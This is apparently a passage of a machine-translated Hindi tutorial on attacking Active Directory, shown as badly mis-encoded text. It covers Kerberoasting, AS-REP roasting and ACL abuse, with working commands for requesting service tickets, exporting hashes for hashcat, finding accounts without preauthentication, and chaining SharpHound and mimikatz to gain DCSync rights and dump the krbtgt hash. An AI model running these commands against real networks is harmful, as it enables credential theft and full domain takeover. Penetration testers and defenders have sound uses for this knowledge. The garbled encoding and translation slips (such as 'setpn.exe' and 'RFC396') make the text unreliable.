рд╣реИред
рд╣рдорд▓реЗ рдХреЗ рд╕рд╛рд░ рдХреЛ рд╕рдордЭрдиреЗ рдХреЗ рд▓рд┐рдП, рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВ рдХрд┐ рдХреЗрд░реНрдмрд░реЛрд╕ рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИред



1. рдкрд╛рд╕рд╡рд░реНрдб NTLM рд╣реИрд╢ рдореЗрдВ рдмрджрд▓ рдЬрд╛рддрд╛ рд╣реИ, рдЯрд╛рдЗрдорд╕реНрдЯреИрдореНрдк рдХреЛ рд╣реИрд╢ рдХреЗ рд╕рд╛рде рдПрдиреНрдХреНрд░рд┐рдкреНрдЯ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рдФрд░ TGT рдЯрд┐рдХрдЯ рдЕрдиреБрд░реЛрдз (AS-REQ) рдореЗрдВ рдПрдХ рдкреНрд░рд╛рдорд╛рдгрд┐рдХ рдХреЗ рд░реВрдк рдореЗрдВ KDC рдХреЛ рднреЗрдЬрд╛ рдЬрд╛рддрд╛ рд╣реИред рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ (KDC) рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЬрд╛рдирдХрд╛рд░реА рдХреА рдЬрд╛рдБрдЪ рдХрд░рддрд╛ рд╣реИ рдФрд░ TGT рдЯрд┐рдХрдЯ рдмрдирд╛рддрд╛ рд╣реИред

2. TGT рдЯрд┐рдХрдЯ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рд╣рд╕реНрддрд╛рдХреНрд╖рд░рд┐рдд рд╣реИ рдФрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ (AS-REP) рдХреЛ рднреЗрдЬрд╛ рдЧрдпрд╛ рд╣реИред рдХреЗрд╡рд▓ рдХреЗрд░реНрдмрд░реЛрд╕ рд╕реЗрд╡рд╛ (KRBTGT) TGT рдЯрд┐рдХрдЯ рд╕реЗ рдбреЗрдЯрд╛ рдЦреЛрд▓ рдФрд░ рдкрдврд╝ рд╕рдХрддреА рд╣реИред

3. TGS рдЯрд┐рдХрдЯ (TGS-REQ) рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░рдиреЗ рдкрд░ рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдПрдХ рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдХреЛ TGT рдЯрд┐рдХрдЯ рднреЗрдЬрддрд╛ рд╣реИред рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдПрдХ TGT рдЯрд┐рдХрдЯ рдЦреЛрд▓рддрд╛ рд╣реИ рдФрд░ PAC рдЪреЗрдХрд╕рдо рдХреЛ рдЪреЗрдХ рдХрд░рддрд╛ рд╣реИред

4. TGS рдЯрд┐рдХрдЯ рд╕реЗрд╡рд╛ рдЦрд╛рддреЗ рдХреЗ рдкрд╛рд╕рд╡рд░реНрдб рдХреЗ NTLM рд╣реИрд╢ рдХреЗ рд╕рд╛рде рдПрдиреНрдХреНрд░рд┐рдкреНрдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ рдФрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ (TGS-REV) рдХреЛ рднреЗрдЬрд╛ рдЬрд╛рддрд╛ рд╣реИред

5. рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЙрд╕ рдХрдВрдкреНрдпреВрдЯрд░ рдХреЛ рдПрдХ TGS рдЯрд┐рдХрдЯ рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИ рдЬрд┐рд╕ рдкрд░ рд╕реЗрд╡рд╛ рдЪрд▓ рд░рд╣реА рд╣реИ (AP-REQ)ред рд╕реЗрд╡рд╛ рдЕрдкрдиреЗ NTLM рд╣реИрд╢ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ TGS рдЯрд┐рдХрдЯ рдЦреЛрд▓рддреА рд╣реИред

6. рд╕реЗрд╡рд╛ рддрдХ рдкрд╣реБрдВрдЪ рдкреНрд░рджрд╛рди рдХреА рдЬрд╛рддреА рд╣реИ (рдПрдПрд╕-рдЖрд░рдИрдкреА)ред

рдЯреАрдЬреАрдПрд╕-рдЯрд┐рдХрдЯ (рдЯреАрдЬреАрдПрд╕-рдЖрд░рдИрдкреА) рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж, рд╣рдо рд╕реЗрд╡рд╛ рдЦрд╛рддреЗ рдХреЗ рд▓рд┐рдП рдкрд╛рд╕рд╡рд░реНрдб рдСрдлрд╝рд▓рд╛рдЗрди рдкрд╛ рд╕рдХрддреЗ рд╣реИрдВред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рд╣реИрд╢рдЯреИрдХ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ред

RFC396 рдХреЗ рдЕрдиреБрд╕рд╛рд░, 20 рдкреНрд░рдХрд╛рд░ рдХреЗ рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди Kerberos рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХреЗ рд▓рд┐рдП рдЖрд░рдХреНрд╖рд┐рдд рд╣реИрдВред рдкреНрд░рд╛рдердорд┐рдХрддрд╛ рдХреЗ рдХреНрд░рдо рдореЗрдВ рдЕрдм рдЙрдкрдпреЛрдЧ рдХрд┐рдП рдЬрд╛рдиреЗ рд╡рд╛рд▓реЗ рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдХреЗ рдкреНрд░рдХрд╛рд░:

  • AES256_CTS_HMAC_SHA1
  • AES128_CTS_HMAC_SHA1
  • RC4_HMAC_MD5

рд╡рд┐рдВрдбреЛрдЬ рдХреЗ рд╣рд╛рд▓ рдХреЗ рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдореЗрдВ, рдПрдИрдПрд╕ рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдХрд╛ рдЙрдкрдпреЛрдЧ рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рд▓реЗрдХрд┐рди рд╡рд┐рдВрдбреЛрдЬ рд╡рд┐рд╕реНрдЯрд╛ рдФрд░ рд╡рд┐рдВрдбреЛрдЬ 2008 рд╕рд░реНрд╡рд░ рдХреЗ рдиреАрдЪреЗ рд╕рд┐рд╕реНрдЯрдо рдХреЗ рд╕рд╛рде рд╕рдВрдЧрддрддрд╛ рдХреЗ рд▓рд┐рдП, RC4 рдПрд▓реНрдЧреЛрд░рд┐рджрдо рдХреЗ рд▓рд┐рдП рд╕рдорд░реНрдерди рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред рдПрдХ рд╣рдорд▓реЗ рдХрд╛ рд╕рдВрдЪрд╛рд▓рди рдХрд░рддреЗ рд╕рдордп, рд╣рдореЗрд╢рд╛ RC4_HMAC_MD5 рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдХреЗ рд╕рд╛рде TGS рдЯрд┐рдХрдЯ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдЬреЛ рддреЗрдЬрд╝ рдкрд╛рд╕рд╡рд░реНрдб рдФрд░ рдлрд┐рд░ рдмрд╛рдХреА рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рд╣рд░реНрдордЬреЗ 0 рдиреЗ рдПрдХ рджрд┐рд▓рдЪрд╕реНрдк рдЕрдзреНрдпрдпрди рдХрд┐рдпрд╛ рдФрд░ рдкрд╛рдпрд╛ рдХрд┐ рдпрджрд┐ рдЖрдк рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдЧреБрдгреЛрдВ рдореЗрдВ рдХреЗрд╡рд▓ рдХреЗрд░реНрдмрд░реЛрд╕ рдПрдИрдПрд╕128 рдФрд░ рдПрдИрдПрд╕ 256 рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рд╕рдорд░реНрдерди рдХреЛ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рдХреЗрд░реНрдмрд░реЛрд╕ рдЯрд┐рдХрдЯ рдЕрднреА рднреА RC4_HMAC_MD5 рдПрдиреНрдХреНрд░рд┐рдкреНрд╢рди рдХреЗ рд╕рд╛рде рдЬрд╛рд░реА рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред



рдбреЛрдореЗрди рд╕реНрддрд░ рдкрд░ RC4_HMAC_MD5 рдХреЛ рдирд┐рд╖реНрдХреНрд░рд┐рдп рдХрд░рдирд╛ рдЖрд╡рд╢реНрдпрдХ рд╣реИ ред

рдХрд░рдмрд░реЛрд╕реНрдЯрд┐рдВрдЧ рд╣рдорд▓реЗ рдореЗрдВ 2 рджреГрд╖реНрдЯрд┐рдХреЛрдг рд╣реИрдВред

1. рдкреБрд░рд╛рдиреА рд╡рд┐рдзрд┐ред TGS рдЯрд┐рдХрдЯ рдХреЗ рд▓рд┐рдП setpn.exe рдпрд╛ .NET System.IdentityModel.Tokens.KerberosRequestorSecurityToken рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЕрдиреБрд░реЛрдз рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдЬреЛ рдкреЙрд╡рд░реНрд╕рд╢реЗрд▓ рд╡рд░реНрдЧ рдХрд╛ рд╣реИ, mimikatz рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдореЗрдореЛрд░реА рд╕реЗ рдкреБрдирд░реНрдкреНрд░рд╛рдкреНрдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдлрд┐рд░ рд╡рд╛рдВрдЫрд┐рдд рдкреНрд░рд╛рд░реВрдк (рдЬреЙрди, рд╣реИрд╕рдХреИрдЯ) рдореЗрдВ рдкрд░рд┐рд╡рд░реНрддрд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рдФрд░ рд╕реЙрд░реНрдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛ред

2. рдирдИ рд╡рд┐рдзрд┐ред machosec рдиреЗ рджреЗрдЦрд╛ рдХрд┐ KerberosRequestorSecurityToken рдХреНрд▓рд╛рд╕ рдореЗрдВ GetRequest рд╡рд┐рдзрд┐ рд╣реИ, рдЬреЛ TGS рдЯрд┐рдХрдЯ рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рдХреЗ рд╕рд╛рде рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рднрд╛рдЧ рдХреЛ рдирд┐рдХрд╛рд▓рддрд╛ рд╣реИред

рд╣рдорд▓реЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдХрд░рдг:

1) SPN рд░рд┐рдХреЙрд░реНрдб рдХреЗ рд▓рд┐рдП рдЦреЛрдЬреЗрдВ


2) рдПрдХ TGS рдЯрд┐рдХрдЯ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░реЗрдВ

  • setpn.exe (рдореВрд▓ Windows рдЙрдкрдпреЛрдЧрд┐рддрд╛)
  • рд╢рдХреНрддрд┐рдпреЛрдВ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЯрд┐рдХрдЯ рдЕрдиреБрд░реЛрдз

     Add-Type -AssemblyNAme System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList тАЬ<ServicePrincipalName>тАЭ 
  • рдЕрдиреБрд░реЛрдз-SPNTicket

рдЖрдк рдХрд┐рдЯрд▓ рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╡рд░реНрддрдорд╛рди рдХреИрд╢реНрдб рдЯрд┐рдХрдЯ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВред

рдЖрдо рдПрд╕рдкреАрдПрди рд░рд┐рдХреЙрд░реНрдб
  • TERMSRV - рд░рд┐рдореЛрдЯ рдбреЗрд╕реНрдХрдЯреЙрдк
  • SmtpSVC рдФрд░ SMTP - рдореЗрд▓
  • WSMAN - WinRM
  • ExchangeAB, ExchangeRFR, ExchangeMDM - MS Exchange
  • POP / POP3 - POP3 рдкреЛрд╕реНрдЯрд▓ рд╕реЗрд╡рд╛
  • IMAP / IMAP4 - IMAP рдИрдореЗрд▓ рд╕реЗрд╡рд╛
  • MSSQLSvc - Microsoft SQL рд╕рд░реНрд╡рд░
  • рдореЛрдВрдЧреЛ - MongoDB рдбреЗрдЯрд╛рдмреЗрд╕ рд╕рд░реНрд╡рд░
  • DNS - DNS рд╕рд░реНрд╡рд░
  • HTTP, WWW - рд╡реЗрдм рд╕рд░реНрд╡рд░
  • LDAP - LDAP
  • рдПрдлрд╝рдЯреАрдкреА - рдПрдлрд╝рдЯреАрдкреА рд╕рд░реНрд╡рд░


3) рдЯрд┐рдХрдЯреЛрдВ рдХрд╛ рдирд┐рд░реНрдпрд╛рдд:



рд╕рднреА 3 рдмрд┐рдВрджреБрдУрдВ рдХреЗ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рдирд┐рд╖реНрдкрд╛рджрди рдХрд╛ рдПрдХ рдЙрджрд╛рд╣рд░рдг:

  • RiskySPN

     Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File kerberoasting.txt 
  • PowerSploit

     Invoke-Kerberoast -Domain jet.lab -OutputFormat Hashcat | fl 
  • GetUserSPNs.py

     GetUserSPNs.py -request jet.lab\user:Password 

Asreproast


рднреЗрджреНрдпрддрд╛ рдпрд╣ рд╣реИ рдХрд┐ Kerberos рдкреВрд░реНрд╡-рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдЕрдХреНрд╖рдо рд╣реИред рдЗрд╕ рдорд╛рдорд▓реЗ рдореЗрдВ, рд╣рдо рдПрдХ рдРрд╕реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ AS-REQ рдЕрдиреБрд░реЛрдз рднреЗрдЬ рд╕рдХрддреЗ рд╣реИрдВ рдЬрд┐рдирдХреЗ рдкрд╛рд╕ рдХреЗрд░реНрдмреЛрд╕ рдкреВрд░реНрд╡-рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдЕрдХреНрд╖рдо рд╣реИ, рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдХреЗ рд╕рд╛рде рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рднрд╛рдЧ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВред



рднреЗрджреНрдпрддрд╛ рджреБрд░реНрд▓рдн рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рдкреНрд░рдЪрд╛рд░ рдЕрдХреНрд╖рдо рдХрд░рдирд╛ рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд╕реЗрдЯрд┐рдВрдЧ рдирд╣реАрдВ рд╣реИред

рдХреЗрд░реНрдмрд░реЛрд╕ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреЗ рд╕рд╛рде рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ рд▓рд┐рдП рдЦреЛрдЬ рдЕрдХреНрд╖рдо:

  • PowerView

     Get-DomainUser -PreauthNotRequired -Properties samaccountname -Verbose 
  • рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЙрдбреНрдпреВрд▓

     get-aduser -filter * -properties DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq "True" -and $_.Enabled -eq "True"} | select Name 

рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рднрд╛рдЧ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛:



рдПрд╕реАрдПрд▓ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╣рдорд▓рд╛


рдПрдХ рдбреЛрдореЗрди рд╕рдВрджрд░реНрдн рдореЗрдВ рдПрдХ ACL рдирд┐рдпрдореЛрдВ рдХрд╛ рдПрдХ рд╕рдореВрд╣ рд╣реИ рдЬреЛ AD рдореЗрдВ рд╡рд╕реНрддреБрдУрдВ рдХреЗ рдЙрдкрдпреЛрдЧ рдХреЗ рдЕрдзрд┐рдХрд╛рд░ рдХреЛ рдкрд░рд┐рднрд╛рд╖рд┐рдд рдХрд░рддрд╛ рд╣реИред рдПрдХ рдПрд╕реАрдПрд▓ рдХреЛ рдПрдХрд▓ рдСрдмреНрдЬреЗрдХреНрдЯ (рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЦрд╛рддрд╛) рдпрд╛ рдПрдХ рд╕рдВрдЧрдардирд╛рддреНрдордХ рдЗрдХрд╛рдИ рдХреЗ рд▓рд┐рдП рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ, рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, OUред рдЬрдм рдЖрдк ACL рдХреЛ OU рдкрд░ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд░рддреЗ рд╣реИрдВ, рддреЛ OU рдХреЗ рднреАрддрд░ рд╕рднреА рдСрдмреНрдЬреЗрдХреНрдЯ ACL рдХреЛ рдЗрдирд╣реЗрд░рд┐рдЯ рдХрд░реЗрдВрдЧреЗред ACL рдореЗрдВ рдЕрднрд┐рдЧрдо рдирд┐рдпрдВрддреНрд░рдг рдкреНрд░рд╡рд┐рд╖реНрдЯрд┐рдпрд╛рдБ (ACEs) рд╣реЛрддреА рд╣реИрдВ рдЬреЛ рдпрд╣ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд░рддреА рд╣реИрдВ рдХрд┐ SID рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдСрдмреНрдЬреЗрдХреНрдЯ рдХреЗ рд╕рд╛рде рдХреИрд╕реЗ рдЗрдВрдЯрд░реИрдХреНрдЯ рдХрд░рддрд╛ рд╣реИред

рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рд╣рдорд╛рд░реЗ рддреАрди рд╕рдореВрд╣ рд╣реИрдВ: A, B, C, рдЬрд╣рд╛рдВ рд╕рдореВрд╣ C рд╕рдореВрд╣ B рдХрд╛ рд╕рджрд╕реНрдп рд╣реИ рдФрд░ рд╕рдореВрд╣ B рд╕рдореВрд╣ A рдХрд╛ рд╕рджрд╕реНрдп рд╣реИред рдЬрдм рдЖрдк рд╕рдореВрд╣ C рдореЗрдВ рдЕрддрд┐рдерд┐ рдЬреЛрдбрд╝рддреЗ рд╣реИрдВ, рддреЛ рдЕрддрд┐рдерд┐ рди рдХреЗрд╡рд▓ рд╕рдореВрд╣ C рдХрд╛ рд╕рджрд╕реНрдп рд╣реЛрдЧрд╛, рдмрд▓реНрдХрд┐ рд╕рдореВрд╣ рдмреА рдФрд░ рдП рдХреЗ рдПрдХ рдЕрдкреНрд░рддреНрдпрдХреНрд╖ рд╕рджрд╕реНрдп рдЬрдм рд╕рдореВрд╣ рдП рдХреЗ рд▓рд┐рдП рдПрдХ рдбреЛрдореЗрди рдСрдмреНрдЬреЗрдХреНрдЯ рддрдХ рдкрд╣реБрдВрдЪ рдЬреЛрдбрд╝рддреЗ рд╣реИрдВ, рддреЛ рдЕрддрд┐рдерд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдкрд╛рд╕ рднреА рдЗрд╕ рдСрдмреНрдЬреЗрдХреНрдЯ рддрдХ рдкрд╣реБрдВрдЪ рд╣реЛрдЧреАред рдРрд╕реА рд╕реНрдерд┐рддрд┐ рдореЗрдВ рдЬрд╣рд╛рдВ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗрд╡рд▓ рдПрдХ рд╕рдореВрд╣ рдХрд╛ рдкреНрд░рддреНрдпрдХреНрд╖ рд╕рджрд╕реНрдп рд╣реИ, рдФрд░ рдпрд╣ рд╕рдореВрд╣ рдЕрдиреНрдп 50 рд╕рдореВрд╣реЛрдВ рдХрд╛ рдЕрдкреНрд░рддреНрдпрдХреНрд╖ рд╕рджрд╕реНрдп рд╣реИ, рд╡рд┐рд░рд╛рд╕рдд рдореЗрдВ рдорд┐рд▓реА рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреЗ рдХрдиреЗрдХреНрд╢рди рдХреЛ рдЦреЛрдирд╛ рдЖрд╕рд╛рди рд╣реИред

рдЖрдк рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдХрд░ рдСрдмреНрдЬреЗрдХреНрдЯ рд╕реЗ рдЬреБрдбрд╝реЗ ACL рдХреЛ рдкреБрдирдГ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ

 Get-ObjectACL -Samaccountname Guest -ResolveGUIDs 

рдЖрдк ACL рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдореЗрдВ рддреНрд░реБрдЯрд┐рдпреЛрдВ рдХрд╛ рдлрд╛рдпрджрд╛ рдЙрдард╛рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдХрд░рдг рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
рдЖрд╣реНрд╡рд╛рди-ACLPwn ред рдкреЙрд╡рд░рд╢реЗрд▓ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдХрд▓реЗрдХреНрдЯрд░, рд╢рд╛рд░реНрдкрд╣рд╛рдЙрдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдбреЛрдореЗрди рдХреЗ рд╕рднреА рдПрд╕реАрдПрд▓ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реА рдПрдХрддреНрд░ рдХрд░рддреА рд╣реИ, рдФрд░ рд░рд╛рдЗрдЯрдбреИрдХ рдЕрдиреБрдорддрд┐ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рдЪреЗрди рдмрдирд╛рддреА рд╣реИред рд╢реНрд░реГрдВрдЦрд▓рд╛ рдХреЗ рдирд┐рд░реНрдорд╛рдг рдХреЗ рдмрд╛рдж, рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд╢реНрд░реГрдВрдЦрд▓рд╛ рдХреЗ рдкреНрд░рддреНрдпреЗрдХ рдЪрд░рдг рдХрд╛ рд╕рдВрдЪрд╛рд▓рди рдХрд░рддреА рд╣реИред рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рдХреНрд░рдо:

  1. рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдЖрд╡рд╢реНрдпрдХ рд╕рдореВрд╣реЛрдВ рдореЗрдВ рдЬреЛрдбрд╝рд╛ рдЬрд╛рддрд╛ рд╣реИред
  2. рдбреЛрдореЗрди рдСрдмреНрдЬреЗрдХреНрдЯ рдХреЗ ACL рдореЗрдВ рджреЛ ACE (рд░реЗрдкреНрд▓рд┐рдХреЗрдЯрд┐рдВрдЧ рдбрд╛рдпрд░реЗрдХреНрдЯрд░реА рдЪреЗрдВрдЬреЗрд╕ рдФрд░ рд░рд┐рдкреНрд▓реЗрдХреНрдЯрд┐рдВрдЧ рдбрд╛рдпрд░реЗрдХреНрдЯрд░реА рдЪреЗрдВрдЬреЗрдЬ рдСрд▓) рдЬреЛрдбрд╝реЗ рдЬрд╛рддреЗ рд╣реИрдВред
  3. рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ Mimikatz рдЙрдкрдпреЛрдЧрд┐рддрд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ DCSync рдХреЗ рдЕрдзрд┐рдХрд╛рд░ рд╣реИрдВ, рддреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ krbtgt рдХрд╛ рдкрд╛рд╕рд╡рд░реНрдб рд╣реИрд╢ рдЕрдиреБрд░реЛрдз рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ (рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд╕реЗрдЯрд┐рдВрдЧ)ред
  4. рдСрдкрд░реЗрд╢рди рдкреВрд░рд╛ рд╣реЛрдиреЗ рдХреЗ рдмрд╛рдж, рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдПрд╕реАрдПрд▓ рдореЗрдВ рд╕рднреА рдЬреЛрдбрд╝реЗ рдЧрдП рд╕рдореВрд╣реЛрдВ рдФрд░ рдПрд╕реАрдИ рдкреНрд░рд╡рд┐рд╖реНрдЯрд┐рдпреЛрдВ рдХреЛ рд╣рдЯрд╛ рджреЗрддреА рд╣реИред

рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреЗрд╡рд▓ рд░рд╛рдЗрдЯрдбреЗрдХ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рдЙрджреНрджреЗрд╢реНрдп рд╕реЗ рд╣реИред рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рдХреЗ рд▓рд┐рдП рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдкрд╣реБрдБрдЪ рдЕрдзрд┐рдХрд╛рд░ рднреА рд░реБрдЪрд┐ рдХреЗ рд╣реЛ рд╕рдХрддреЗ рд╣реИрдВ:

  • ForceChangePasswordред рд╡рд░реНрддрдорд╛рди рдкрд╛рд╕рд╡рд░реНрдб рдЬреНрдЮрд╛рдд рдирд╣реАрдВ рд╣реЛрдиреЗ рдкрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкрд╛рд╕рд╡рд░реНрдб рдмрджрд▓рдиреЗ рдХрд╛ рдЕрдзрд┐рдХрд╛рд░ред PowerSploit рдХреЗ рд╕рд╛рде рдСрдкрд░реЗрд╢рди - Set-DomainUserPasswordред
  • AddMembersред рд╕рдореВрд╣реЛрдВ, рдХрдВрдкреНрдпреВрдЯрд░реЛрдВ рдФрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЛ рд╕рдореВрд╣реЛрдВ рдореЗрдВ рдЬреЛрдбрд╝рдиреЗ рдХрд╛ рдЕрдзрд┐рдХрд╛рд░ред PowerSploit рдХреЗ рд╕рд╛рде рдСрдкрд░реЗрд╢рди - Add-DomainGroupMemberред
  • GenericWriteред рдХрд┐рд╕реА рд╡рд╕реНрддреБ рдХреА рд╡рд┐рд╢реЗрд╖рддрд╛рдУрдВ рдХреЛ рдмрджрд▓рдиреЗ рдХреЗ рдЕрдзрд┐рдХрд╛рд░ред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, scriptPath рдкреИрд░рд╛рдореАрдЯрд░ рдХрд╛ рдорд╛рди рдмрджрд▓реЗрдВред рдЕрдЧрд▓реА рдмрд╛рд░ рдЬрдм рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕рд┐рд╕реНрдЯрдо рдкрд░ рд▓реЙрдЧ рдХрд░рддрд╛ рд╣реИ, рддреЛ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдлрд╝рд╛рдЗрд▓ рд╢реБрд░реВ рд╣реЛрддреА рд╣реИред рдкреЙрд╡рд░рд╕реНрдкреНрд▓реЛрдЗрдЯ рдХреЗ рд╕рд╛рде рдСрдкрд░реЗрд╢рди - рд╕реЗрдЯ-рдбреЛрдореЗрдирдСрдмреНрдЬреЗрдХреНрдЯред
  • WriteOwnerред рд╡рд╕реНрддреБ рдХреЗ рдорд╛рд▓рд┐рдХ рдХреЛ рдмрджрд▓рдиреЗ рдХреЗ рдЕрдзрд┐рдХрд╛рд░ред PowerSploit рдХреЗ рд╕рд╛рде рдСрдкрд░реЗрд╢рди - Set-DomainObjectOwnerред
  • AllExtendedRightsред рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЛ рд╕рдореВрд╣реЛрдВ рдореЗрдВ рдЬреЛрдбрд╝рдиреЗ рдХреЗ рд▓рд┐рдП рдЕрдзрд┐рдХрд╛рд░, рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкрд╛рд╕рд╡рд░реНрдб рдмрджрд▓рдиреЗ рдЖрджрд┐, PowerSploit - Set-DomainUserPassword рдпрд╛ Add-DomainGroupMember рдХреЗ рд╕рд╛рде рд╕рдВрдЪрд╛рд▓рдиред

рдСрдкрд░реЗрд╢рди:


рдПрдХ рдорд╢реАрди рд╕реЗ рд╢реБрд░реВ рдЬреЛ рдПрдХ рдбреЛрдореЗрди рдореЗрдВ рд╣реИ

 ./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe 

